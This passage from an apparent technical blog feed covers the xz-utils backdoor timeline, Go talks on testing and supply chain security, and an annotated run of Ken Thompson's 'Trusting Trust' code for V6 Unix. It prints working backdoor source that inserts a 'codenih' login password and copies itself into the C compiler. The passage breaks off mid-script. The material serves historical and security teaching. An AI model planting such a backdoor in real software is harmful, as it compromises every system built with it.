href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=a100f9111c8cc7f5b5f0e4a5e8af3de7161c7975">breaks landlock detection</a> in configure script by adding a subtle typo in the C program used to check for <a href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>. The configure script tries to build and run the C program to check for landlock support, but since the C program has a syntax error, it will never build and run, and the script will always decide there is no landlock support. Lasse Collin is listed as the committer; he may have missed the subtle typo, or the author may be forged. Probably the former, since Jia Tan did not bother to forge committer on his many other changes. This patch seems to be setting up for something besides the sshd change, since landlock support is part of the xz command and not liblzma. Exactly what is unclear. <p> <b>2024-02-29</b>: On GitHub, @teknoraver <a href="https://github.com/systemd/systemd/pull/31550">sends pull request</a> to stop linking liblzma into libsystemd. It appears that this would have defeated the attack. <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Kevin Beaumont speculates</a> that knowing this was on the way may have accelerated the attacker’s schedule. @teknoraver <a href="https://news.ycombinator.com/item?id=39916125">commented on HN</a> that the liblzma PR was one in a series of dependency slimming changes for libsystemd; there were <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1917693005">two</a> <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1918667390">mentions</a> of it in late January. <p> <b>2024-03-04</b>: RedHat distributions <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598">start seeing Valgrind errors</a> in liblzma’s <code>_get_cpuid</code> (the entry to the backdoor). The race is on to fix this before the Linux distributions dig too deeply. <p> <b>2024-03-05</b>: The <a href="https://github.com/systemd/systemd/commit/3fc72d54132151c131301fc7954e0b44cdd3c860">libsystemd PR is merged</a> to remove liblzma. Another race is on, to get liblzma backdoor’ed before the distros break the approach entirely. <p> <b>2024-03-05</b>: Debian <a href="https://tracker.debian.org/news/1509743/xz-utils-560-02-migrated-to-testing/">adds xz-utils 5.6.0-0.2</a> to testing. <p> <b>2024-03-05</b>: Jia Tan commits <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ed957d39426695e948b06de0ed952a2fbbe84bd1">two ifunc</a> <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4e1c97052b5f14f4d6dda99d12cbbd01e66e3712">bug fixes</a>. These seem to be real fixes for the actual ifunc bug. One commit links to the Gentoo bug and also typos an <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=114115">upstream GCC bug</a>. <p> <b>2024-03-08</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=82ecc538193b380a21622aea02b0ba078e7ade92">commits purported Valgrind fix</a>. This is a misdirection, but an effective one. <p> <b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">commits updated backdoor files</a>. This is the actual Valgrind fix, changing the two test files containing the attack code. “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” <p> <b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=fd1b975b7851e081ed6e5cf63df946cd5cbdbb94">tags and build v5.6.1</a> and publishes xz 5.6.1 distribution, containing a new backdoor. To date I have not seen any analysis of how the old and new backdoors differ. <p> <b>2024-03-20</b>: Lasse Collin sends LKML a patch set <a href="https://lkml.org/lkml/2024/3/20/1009">replacing his personal email</a> with <a href="https://lkml.org/lkml/2024/3/20/1008">both himself and Jia Tan</a> as maintainers of the xz compression code in the kernel. There is no indication that Lasse Collin was acting nefariously here, just cleaning up references to himself as sole maintainer. Of course, Jia Tan may have prompted this, and being able to send xz patches to the Linux kernel would have been a nice point of leverage for Jia Tan’s future work. We’re not at <a href="nih">trusting trust</a> levels yet, but it would be one step closer. <p> <b>2024-03-25</b>: Hans Jansen is back (!), <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708">filing a Debian bug</a> to get xz-utils updated to 5.6.1. Like in the 2022 pressure campaign, more name###@mailhost addresses that don’t otherwise exist on the internet show up to advocate for it. <p> <b>2024-03-27</b>: Debian updates to 5.6.1. <p> <b>2024-03-28</b>: Jia Tan <a href="https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417">files an Ubuntu bug</a> to get xz-utils updated to 5.6.1 from Debian. <a class=anchor href="#attack_detected"><h2 id="attack_detected">Attack detected</h2></a> <p> <b>2024-03-28</b>: Andres Freund discovers bug, privately notifies Debian and distros@openwall. RedHat assigns CVE-2024-3094. <p> <b>2024-03-28</b>: Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/">rolls back 5.6.1</a>, introducing 5.6.1+really5.4.5-1. <p> <b>2024-03-28</b>: Arch Linux <a href="https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad">changes 5.6.1 to build from Git</a>. <p> <b>2024-03-29</b>: Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">posts backdoor warning</a> to public oss-security@openwall list, saying he found it “over the last weeks”. <p> <b>2024-03-29</b>: RedHat <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users">announces that the backdoored xz shipped</a> in Fedora Rawhide and Fedora Linux 40 beta. <p> <b>2024-03-30</b>: Debian <a href="https://fulda.social/@Ganneff/112184975950858403">shuts down builds</a> to rebuild their build machines using Debian stable (in case the malware xz escaped their sandbox?). <p> <b>2024-03-30</b>: Haiku OS <a href="https://github.com/haikuports/haikuports/commit/3644a3db2a0ad46971aa433c105e2cce9d141b46">moves to GitHub source repo snapshots</a>. <a class=anchor href="#further_reading"><h2 id="further_reading">Further Reading</h2></a> <ul> <li> Evan Boehs, <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor">Everything I know about the XZ backdoor</a> (2024-03-29). <li> Filippo Valsorda, <a href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky</a> re backdoor operation (2024-03-30). <li> Michał Zalewski, <a href="https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor">Techies vs spies: the xz backdoor debate</a> (2024-03-30). <li> Michał Zalewski, <a href="https://lcamtuf.substack.com/p/oss-backdoors-the-allure-of-the-easy">OSS backdoors: the folly of the easy fix</a> (2024-03-31). <li> Connor Tumbleson, <a href="https://connortumbleson.com/2024/03/31/watching-xz-unfold-from-afar/">Watching xz unfold from afar</a> (2024-03-31). <li> nugxperience, <a href="https://twitter.com/nugxperience/status/1773906926503591970">Twitter</a> re awk and rc4 (2024-03-29) <li> birchb0y, <a href="https://twitter.com/birchb0y/status/1773871381890924872">Twitter</a> re time of day of commit vs level of evil (2024-03-29) <li> Dan Feidt, <a href="https://unicornriot.ninja/2024/xz-utils-software-backdoor-uncovered-in-years-long-hacking-plot/">‘xz utils’ Software Backdoor Uncovered in Years-Long Hacking Plot</a> (2024-03-30) <li> smx-smz, <a href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">[WIP] XZ Backdoor Analysis and symbol mapping</a> <li> Dan Goodin, <a href="https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/">What we know about the xz Utils backdoor that almost infected the world</a> (2024-04-01) <li> Akamai Security Intelligence Group, <a href="https://www.akamai.com/blog/security-research/critical-linux-backdoor-xz-utils-discovered-what-to-know">XZ Utils Backdoor — Everything You Need to Know, and What You Can Do</a> (2024-04-01) <li> Kevin Beaumont, <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Inside the failed attempt to backdoor SSH globally — that got caught by chance</a> (2024-03-31) <li> amlweems, <a href="https://github.com/amlweems/xzbot">xzbot: notes, honeypot, and exploit demo for the xz backdoor</a> (2024-04-01) <li> Rhea Karty and Simon Henniger, <a href="https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and">XZ Backdoor: Times, damned times, and scams</a> (2024-03-30) <li> Andy Greenberg and Matt Burgess, <a href="https://www.wired.com/story/jia-tan-xz-backdoor/">The Mystery of ‘Jia Tan,’ the XZ Backdoor Mastermind</a> (2024-04-03) <li> <a href="https://risky.biz/RB743/">Risky Business #743 -- A chat about the xz backdoor with the guy who found it</a> (2024-04-03)</ul> Go Changes tag:research.swtch.com,2012:research.swtch.com/gochanges 2023-12-08T12:00:00-05:00 2023-12-08T12:02:00-05:00 The way Go changes, and how to improve it with telemetry. <p> I opened GopherCon (USA) in October with the talk “Go Changes”, which looked at how Go evolves, the importance of data in making shared decisions, and why opt-in telemetry in the Go toolchain is a useful, effective, and appropriate new source of data. <p> I re-recorded it at home and have posted it here: <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/BNmxtp26I5s?si=3ZpIWEA72ehzJrVO" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Links: <ul> <li> <a href="https://go.dev/s/proposal">The Go Proposal Process</a> <li> <a href="sample">The Magic of Sampling</a> <li> <a href="telemetry">Go Telemetry Blog Posts</a></ul> <p> Errata: <ul> <li> There is a mistake in the probability discussion: (2/3)<sup>100</sup> is about 2.46×10<sup>–18</sup>, not 1.94×10<sup>–48</sup>. The latter is (1/3)<sup>100</sup>. The probability of pulling 100 gophers without getting the third color remains vanishingly small. Apologies for the mistake.</ul> Go Testing By Example tag:research.swtch.com,2012:research.swtch.com/testing 2023-12-05T08:00:00-05:00 2023-12-05T08:02:00-05:00 The importance of testing, and twenty tips for writing good tests. <p> I opened GopherCon Australia in early November with the talk “Go Testing By Example”. Being the first talk, there were some A/V issues, so I re-recorded it at home and have posted it here: <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/X4rxi9jStLo?si=DJiEGUPNxPlYnlWL" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Here are the 20 tips from the talk: <ol> <li> Make it easy to add new test cases. <li> Use test coverage to find untested code. <li> Coverage is no substitute for thought. <li> Write exhaustive tests. <li> Separate test cases from test logic. <li> Look for special cases. <li> If you didn’t add a test, you didn’t fix the bug. <li> Not everything fits in a table. <li> Test cases can be in testdata files. <li> Compare against other implementations. <li> Make test failures readable. <li> If the answer can change, write code to update them. <li> Use <a href="https://pkg.go.dev/golang.org/x/tools/txtar">txtar</a> for multi-file test cases. <li> Annotate existing formats to create testing mini-languages. <li> Write parsers and printers to simplify tests. <li> Code quality is limited by test quality. <li> Scripts make good tests. <li> Try <a href="https://pkg.go.dev/rsc.io/script">rsc.io/script</a> for your own script-based test cases. <li> Improve your tests over time. <li> Aim for continuous deployment.</ol> <p> Enjoy! Open Source Supply Chain Security at Google tag:research.swtch.com,2012:research.swtch.com/acmscored 2023-11-30T04:10:00-05:00 2023-11-30T04:12:00-05:00 A remote talk at ACM SCORED 2023 <p> I was a remote opening keynote speaker at <a href="https://scored.dev/">ACM SCORED 2023</a>, which we decided meant that I sent a video to play and I was on Discord during the talk for attendees to text directly with question as the video played, and then we did some live but still remote Q&amp;A after the talk. <p> My talk was titled “Open Source Supply Chain Security at Google” and was 45 minutes long. I spent a while at the start defining open source supply chain security and a while at the end on comparisons with the 1970s. In between, I talked about various supply chain-related efforts at Google. All the Google efforts mentioned in the talk have been publicly discussed elsewhere and are linked below. <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/6H-V-0oQvCA?si=mprcItvmNMw5QnR0" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Here are the <a href="https://youtu.be/6H-V-0oQvCA">talk video</a> and <a href="acmscored.pdf">talk slides</a>. Opinions expressed in the talk about languages and the last half century of supply chain security are mine, not Google’s. <p> References or acknowledgements for the slides: <ul> <li> Crypto AG: <a href="https://www.theguardian.com/us-news/2020/feb/11/crypto-ag-cia-bnd-germany-intelligence-report">Guardian</a> and <a href="https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/">Washington Post</a> <li> Enigma photograph: personal photo, taken at Bletchley Park in 2012 <li> XcodeGhost: <a href="https://unit42.paloaltonetworks.com/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/">Palo Alto Networks</a> <li> Juniper Attack: <a href="https://cacm.acm.org/magazines/2018/11/232227-where-did-i-leave-my-keys/fulltext">CACM</a>, <a href="https://eprint.iacr.org/2016/376.pdf">Eprint</a>, <a href="https://www.bloomberg.com/news/features/2021-09-02/juniper-mystery-attacks-traced-to-pentagon-role-and-chinese-hackers">Bloomberg</a> <li> SolarWinds: <a href="https://www.wired.com/story/the-untold-story-of-solarwinds-the-boldest-supply-chain-hack-ever/">Wired (Kim Zetter)</a> <li> NPM event-stream: <a href="https://arstechnica.com/information-technology/2018/11/hacker-backdoors-widely-used-open-source-software-to-steal-bitcoin/">Ars Technica</a>, <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">NPM</a> <li> iMessage JBIG2: <a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">Project Zero</a> <li> Log4j: <a href="https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition">Minecraft</a>, <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">CISA</a> <li> <a href="https://deps.dev/go/k8s.io%2Fkubernetes/v1.28.4/dependencies/graph">Kubernetes on Open Source Insights</a> and <a href="https://deps.dev/go/k8s.io%2Fkubernetes/v1.28.4/compare?v2=v1.29.0-rc.0">comparing versions</a> <li> <a href="https://www.sigstore.dev/">Sigstore</a> <li> “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” <li> “<a href="https://go.dev/blog/supply-chain">How Go Mitigates Supply Chain Attacks</a>” <li> Two-person photograph: <a href="https://www.nationalmuseum.af.mil/Visit/Museum-Exhibits/Fact-Sheets/Display/Article/197675/launching-missiles/">Air Force National Museum</a>, public domain <li> <a href="https://slsa.dev/spec/v1.0/levels">SLSA (Supply-chain Levels for Software Artifacts)</a> <li> <a href="https://securityscorecards.dev/">Security Scorecards</a> <li> Capslock: <a href="https://security.googleblog.com/2023/09/capslock-what-is-your-code-really.html">blog post</a>, <a href="https://github.com/google/capslock">repository</a> <li> Google <a href="https://bughunters.google.com/open-source-security">Open Source Security Rewards</a> <li> Google Project Zero: <a href="https://security.googleblog.com/2014/07/announcing-project-zero.html">blog post</a>, <a href="https://www.youtube.com/watch?v=My_13FXODdU">excellent video</a> <li> OSS-Fuzz: <a href="https://opensource.googleblog.com/2016/12/announcing-oss-fuzz-continuous-fuzzing.html">blog post</a>, <a href="https://github.com/google/oss-fuzz">repository</a> <li> <a href="https://syzkaller.appspot.com/upstream">Syzkaller dashboard</a> <li> Internet worm: <a href="https://timesmachine.nytimes.com/timesmachine/1988/11/04/issue.html">New York Times</a> <li> <a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF">NSA Software Memory Safety</a> <li> <a href="https://go.dev/">Go home page</a> <li> <a href="https://www.rust-lang.org/">Rust home page</a> <li> SBOMs: “<a href="https://www.ntia.gov/sites/default/files/publications/ntia_sbom_framing_2nd_edition_20211021_0.pdf">NTIA: Framing Software Component Transparency</a>”, “<a href="https://www.cisa.gov/sites/default/files/2023-10/Software-Identification-Ecosystem-Option-Analysis-508c.pdf">CISA: Software Identification Ecosystem Option Analysis</a>” <li> <a href="https://osv.dev">Open Source Vulnerability</a> database <li> Govulncheck: <a href="https://go.dev/blog/govulncheck">blog post</a>, <a href="https://pkg.go.dev/golang.org/x/vuln/cmd/govulncheck">package docs</a>, <a href="https://go.dev/doc/tutorial/govulncheck">tutorial</a> <li> <a href="https://cloud.google.com/artifact-registry/docs/analysis">Google Cloud Artifact Analysis</a> <li> <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force Review of Multics</a> (quotes are from pages numbered 51 and 52 on the paper, aka PDF pages 55 and 56) <li> Thompson backdoor: “<a href="https://dl.acm.org/doi/10.1145/358198.358210">Reflections on Trusting Trust</a>” (1983) and <a href="https://research.swtch.com/nih">annotated code</a> (2023)</ul> Running the “Reflections on Trusting Trust” Compiler tag:research.swtch.com,2012:research.swtch.com/nih 2023-10-25T21:00:00-04:00 2023-10-25T21:00:00-04:00 Ken Thompson’s Turing award lecture, running in your browser. <style> body { font-family: 'Minion 3'; } .nih pre { padding-top: 0.2em; margin: 0; } .nih { border-spacing: 0; } .nih tr { padding: 0; } .nih td { padding: 0.5em; min-width: 25em; } .nih td { vertical-align: top; } .nih td.l { font-style: italic; } .nih td.r { background-color: #eee; } .nih td p { text-align: right; clear: both; margin-block-start: 0; margin-block-end: 0; } .nih td div { float: right; } .string { color: #700; } .del { color: #aaa; } .ins { font-weight: bold; } </style> <p> Supply chain security is a hot topic today, but it is a very old problem. In October 1983, 40 years ago this week, Ken Thompson chose supply chain security as the topic for his Turing award lecture, although the specific term wasn’t used back then. (The field of computer science was still young and small enough that the ACM conference where Ken spoke was the “Annual Conference on Computers.”) Ken’s lecture was later published in <i>Communications of the ACM</i> under the title “<a href="https://dl.acm.org/doi/pdf/10.1145/358198.358210">Reflections on Trusting Trust</a>.” It is a classic paper, and a short one (3 pages); if you haven’t read it yet, you should. This post will still be here when you get back. </p> <p> In the lecture, Ken explains in three steps how to modify a C compiler binary to insert a backdoor when compiling the “login” program, leaving no trace in the source code. In this post, we will run the backdoored compiler using Ken’s actual code. But first, a brief summary of the important parts of the lecture. </p> <a class=anchor href="#step1"><h2 id="step1">Step 1: Write a Self-Reproducing Program</h2></a> <p> Step 1 is to write a program that prints its own source code. Although the technique was not widely known in 1975, such a program is now known in computing as a “<a href="https://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,” popularized by Douglas Hofstadter in <i>Gödel, Escher, Bach</i>. Here is a Python quine, from <a href="https://cs.lmu.edu/~ray/notes/quineprograms/">this collection</a>: </p> <pre> s=<span class="string">’s=%r;print(s%%s)’</span>;print(s%s) </pre> <p> And here is a slightly less cryptic Go quine: </p> <pre> package main func main() { print(q + "\x60" + q + "\x60") } var q = <span class=string>`package main func main() { print(q + "\x60" + q + "\x60") } var q = `</span> </pre> <p>The general idea of the solution is to put the text of the program into a string literal, with some kind of placeholder where the string itself should be repeated. Then the program prints the string literal, substituting that same literal for the placeholder. In the Python version, the placeholder is <code>%r</code>; in the Go version, the placeholder is implicit at the end of the string. For more examples and explanation, see my post “<a href="zip">Zip Files All The Way Down</a>,” which uses a Lempel-Ziv quine to construct a zip file that contains itself. </p> <a class=anchor href="#step2"><h2 id="step2">Step 2: Compilers Learn</h2></a> <p> Step 2 is to notice that when a compiler compiles itself, there can be important details that persist only in the compiler binary, not in the actual source code. Ken gives the example of the numeric values of escape sequences in C strings. You can imagine a compiler containing code like this during the processing of escaped string literals: </p> <pre> c = next(); if(c == '\\') { c = next(); if(c == 'n') c = '\n'; } </pre> <p> That code is responsible for processing the two character sequence <code>\n</code> in a string literal and turning it into a corresponding byte value, specifically <code>’\n’</code>. But that’s a circular definition, and the first time you write code like that it won’t compile. So instead you write <code>c = 10</code>, you compile and install the compiler, and <i>then</i> you can change the code to <code>c = ’\n’</code>. The compiler has “learned” the value of <code>’\n’</code>, but that value only appears in the compiler binary, not in the source code. </p> <a class=anchor href="#step3"><h2 id="step3">Step 3: Learn a Backdoor</h2></a> <p> Step 3 is to put these together to help the compiler “learn” to miscompile the target program (<code>login</code> in the lecture). It is fairly straightforward to write code in a compiler to recognize a particular input program and modify its code, but that code would be easy to find if the compiler source were inspected. Instead, we can go deeper, making two changes to the compiler: </p> <ol> <li>Recognize <code>login</code> and insert the backdoor. <li>Recognize the compiler itself and insert the code for these two changes. </ol> <p> The “insert the code for these two changes” step requires being able to write a self-reproducing program: the code must reproduce itself into the new compiler binary. At this point, the compiler binary has “learned” the miscompilation steps, and the clean source code can be restored. </p> <a class=anchor href="#run"><h2 id="run">Running the Code</h2></a> <p>At the Southern California Linux Expo in March 2023, Ken gave the closing keynote, <a href="https://www.youtube.com/live/kaandEt_pKw?si=RGKrC8c0B9_AdQ9I&t=643">a delightful talk</a> about his 75-year effort accumulating what must be the world’s largest privately held digital music collection, complete with actual jukeboxes and a player piano (video opens at 10m43s, when his talk begins). During the Q&A session, someone <a href="https://www.youtube.com/live/kaandEt_pKw?si=koOlE35Q3mjqH4yf&t=3284">jokingly asked</a> about the Turing award lecture, specifically “can you tell us right now whether you have a backdoor into every copy of gcc and Linux still today?” Ken replied: </p> <blockquote> I assume you’re talking about some paper I wrote a long time ago. No, I have no backdoor. That was very carefully controlled, because there were some spectacular fumbles before that. I got it released, or I got somebody to steal it from me, in a very controlled sense, and then tracked whether they found it or not. And they didn’t. But they broke it, because of some technical effect, but they didn’t find out what it was and then track it. So it never got out, if that’s what you’re talking about. I hate to say this in front of a big audience, but the one question I’ve been waiting for since I wrote that paper is “you got the code?” Never been asked. I still have the code. </blockquote> <p>Who could resist that invitation!? Immediately after watching the video on YouTube in September 2023, I emailed Ken and asked him for the code. Despite my being six months late, he said I was the first person to ask and mailed back an attachment called <code>nih.a</code>, a cryptic name for a cryptic program. (Ken tells me it does in fact stand for “not invented here.”) Normally today, <code>.a</code> files are archives containing compiler object files, but this one contains two source files.</p> <p> The code applies cleanly to the C compiler from the <a href="https://en.wikipedia.org/wiki/Research_Unix">Research Unix Sixth Edition (V6)</a>. I’ve posted an online emulator that runs V6 Unix programs and populated it with some old files from Ken and Dennis, including <code>nih.a</code>. Let’s actually run the code. You can <a href="https://research.swtch.com/v6">follow along in the simulator</a>.</p> <table class="nih"> <tr> <td class=l> <p>Login as <code>ken</code>, password <code>ken</code>.<br> (The password is normally not shown.) <td class=r><pre>login: <b>ken</b> Password: <b>ken</b> % <b>who</b> ken tty8 Aug 14 22:06 % </pre> <tr> <td class=l> <p>Change to and list the <code>nih</code> directory,<br> discovering a Unix archive. <td class=r><pre> % <b>chdir nih</b> % <b>ls</b> nih.a </pre> <tr> <td class=l> <p>Extract <code>nih.a</code>. <td class=r><pre> % <b>ar xv nih.a</b> x x.c x rc </pre> <tr> <td class=l> <p>Let’s read <code>x.c</code>, a C program. <td class=r><pre> % <b>cat x.c</b> </pre> <tr> <td class=l> <p>Declare the global variable <code>nihflg</code>,<br> of implied type <code>int</code>. <td class=r><pre> nihflg; </pre> <tr> <td class=l> <p> Define the function <code>codenih</code>, with implied<br> return type <code>int</code> and no arguments.<br> The compiler will be modified to call <code>codenih</code><br> during preprocessing, for each input line. <td class=r><pre> codenih() { char *p,*s; int i; </pre> <tr> <td class=l> <p><code>cc -p</code> prints the preprocessor output<br> instead of invoking the compiler back end.<br> To avoid discovery, do nothing when <code>-p</code> is used.<br> The implied return type of <code>codenih</code> is <code>int</code>,<br> but early C allowed omitting the return value. <td class=r><pre> if(pflag) return; </pre> <tr> <td class=l> <p>Skip leading tabs in the line. <td class=r><pre> p=line; while(*p=='\t') p++; </pre> <tr> <td class=l> <p>Look for the line<br> “<code>name = crypt(pwbuf);</code>” from <a href="login.c#crypt"><code>login.c</code></a>.<br> If not found, jump to <code>l1</code>. <td class=r><pre> s="namep = crypt(pwbuf);"; for(i=0;i&lt;21;i++) if(s[i]!=p[i]) goto l1; </pre> <tr> <td class=l> <p>Define <code>login</code> backdoor code <code>s</code>, which does:<br> Check for the password “<code>codenih</code>”.<br> If found, modify <code>namep</code> and <code>np</code><br> so that the code that follows in <br> <a href="login.c#crypt"><code>login.c</code></a> will accept the password. <td class=r><pre> p=+i; s="for(c=0;c&lt;8;c++)" "if(\"codenih\"[c]!=pwbuf[c])goto x1x;" "while(*namep)namep++;" "while(*np!=':')np++;x1x:"; </pre> <tr> <td class=l> <p>With the <code>p=+i</code> from above,<br> this is: <code>strcpy(p+i, s); return;</code>,<br> appending the backdoor to the line.<br> In early C, <code>+=</code> was spelled <code>=+</code>.<br> The loop is <code>strcpy</code>, and <code>goto l4</code><br> jumps to the end of the function. <td class=r><pre> for(i=0;;i++) if(!(*p++=s[i])) break; goto l4; </pre> <tr> <td class=l> <p>No match for <code>login</code> code. Next target:<br> the distinctive line “<code>av[4] = "-P";</code>”<br> from <a href="cc.c#av4">cc.c</a>. If not found, jump to <code>l2</code>. <td class=r><pre> l1: s="av[4] = \"-P\";"; for(i=0;i&lt;13;i++) if(s[i]!=p[i]) goto l2; </pre> <tr> <td class=l> <p>Increment <code>nihflg</code> to 1 to remember<br> evidence of being in <code>cc.c</code>, and return. <td class=r><pre> nihflg++; goto l4; </pre> <tr> <td class=l> <p> Next target: <a href="cc.c#getline">input reading loop in <code>cc.c</code></a>,<br> but only if we’ve seen the <code>av[4]</code> line too:<br> the text “<code>while(getline()) {</code>”<br> is too generic and may be in other programs.<br> If not found, jump to <code>l3</code>. <td class=r><pre> l2: if(nihflg!=1) goto l3; s="while(getline()) {"; for(i=0;i&lt;18;i++) if(s[i]!=p[i]) goto l3; </pre> <tr> <td class=l> <p> Append input-reading backdoor: call <code>codenih</code><br> (this very code!) after reading each line.<br> Increment <code>nihflg</code> to 2 to move to next state. <td class=r><pre> p=+i; s="codenih();"; for(i=0;;i++) if(!(*p++=s[i])) break; nihflg++; goto l4; </pre> <tr> <td class=l> <p>Next target: <a href="cc.c#fflush">flushing output in <code>cc.c</code></a>. <td class=r><pre> l3: if(nihflg!=2) goto l4; s="fflush(obuf);"; for(i=0;i&lt;13;i++) if(s[i]!=p[i]) goto l4; </pre> <tr> <td class=l> <p>Insert end-of-file backdoor: call <code>repronih</code><br> to reproduce this very source file<br> (the definitions of <code>codenih</code> and <code>repronih</code>)<br> at the end of the now-backdoored text of <code>cc.c</code>. <td class=r><pre> p=+i; s="repronih();"; for(i=0;;i++) if(!(*p++=s[i])) break; nihflg++; l4:; } </pre> <tr> <td class=l> <p>Here the magic begins, as presented in the<br> Turing lecture. The <code>%0</code> is not valid C.<br> Instead, the script <code>rc</code> will replace the <code>%</code><br> with byte values for the text of this exact file,<br> to be used by <code>repronih</code>. <td class=r><pre> char nihstr[] { %0 }; </pre> <tr> <td class=l> <p>The magic continues.<br> <td class=r><pre> repronih() { int i,n,c; </pre> <tr> <td class=l> <p>If <code>nihflg</code> is not 3, this is not <code>cc.c</code><br> so don’t do anything. <td class=r><pre> if(nihflg!=3) return; </pre> <tr> <td class=l> <p>The most cryptic part of the whole program.<br> Scan over <code>nihstr</code> (indexed by <code>i</code>)<br> in five phases according to the value <code>n</code>: <div> <code>n=0</code>: emit literal text before “<code>%</code>”<br> <code>n=1</code>: emit octal bytes of text before “<code>%</code>”<br> <code>n=2</code>: emit octal bytes of “<code>%</code>” and rest of file<br> <code>n=3</code>: no output, looking for “<code>%</code>”<br> <code>n=4</code>: emit literal text after “<code>%</code>”<br> </div> <td class=r><pre> n=0; i=0; for(;;) switch(c=nihstr[i++]){ </pre> <tr> <td class=l> <p><code>045</code> is <code>'%'</code>, kept from appearing<br> except in the magic location inside <code>nihstr</code>.<br> Seeing <code>%</code> increments the phase.<br> The phase transition 0 → 1 rewinds the input.<br> Only phase 2 keeps processing the <code>%.</code> <td class=r><pre> case 045: n++; if(n==1) i=0; if(n!=2) continue; </pre> <tr> <td class=l> <p>In phases 1 and 2, emit octal byte value<br> (like <code>0123,</code>) to appear inside <code>nihstr</code>.</code><br> Note the comma to separate array elements,<br> so the <code>0</code> in <code>nihstr</code>’s <code>%0</code> above is a final,<br> terminating NUL byte for the array. <td class=r><pre> default: if(n==1||n==2){ putc('0',obuf); if(c>=0100) putc((c>>6)+'0',obuf); if(c>=010) putc(((c>>3)&7)+'0',obuf); putc((c&7)+'0',obuf); putc(',',obuf); putc('\n',obuf); continue; } </pre> <tr> <td class=l> <p>In phases 0 and 4, emit literal byte value,<br> to reproduce source file around the <code>%</code>.<br> <td class=r><pre> if(n!=3) putc(c,obuf); continue; </pre> <tr> <td class=l> <p>Reaching end of <code>nihstr</code> increments the phase<br> and rewinds the input.<br> The phase transition 4 → 5 ends the function.</code> <td class=r><pre> case 0: n++; i=0; if(n==5){ fflush(obuf); return; } } } </pre> <tr> <td class=l> <p>Now let’s read <code>rc</code>, a shell script. <td class=r><pre> % <b>cat rc</b> </pre> <tr> <td class=l> <p>Start the editor <code>ed</code> on <code>x.c</code>.<br> The V6 shell <code>sh</code> opened<br> input scripts on standard input,<br> sharing it with invoked commands,<br> so the lines that follow are for <code>ed</code>. <td class=r><pre> ed x.c </pre> <tr> <td class=l> <p>Delete all tabs from every line. <td class=r><pre> 1,$s/ //g </pre> <tr> <td class=l> <p>Write the modified file to <code>nih.c</code> and quit.<br> The shell will continue reading the input script. <td class=r><pre> w nih.c q </pre> <tr> <td class=l> <p>Octal dump bytes of <code>nih.c</code> into <code>x</code>.<br> The output looks like: </p> <div><code>% echo az | od -b<br> 0000000 141 172 012 000<br> 0000003 <br> %<br> </code></div> <p>Note the trailing <code>000</code> for an odd-sized input.<br> </code></div> </pre> <td class=r><pre> od -b nih.c >x </pre> <tr> <td class=l> <p>Back into <code>ed</code>, this time editing <code>x</code>. <td class=r><pre> ed x </pre> <tr> <td class=l> <p>Remove the leading file offsets, adding a <code>0</code><br> at the start of the first byte value. <td class=r><pre> 1,$s/^....... 0*/0/ </pre> <tr> <td 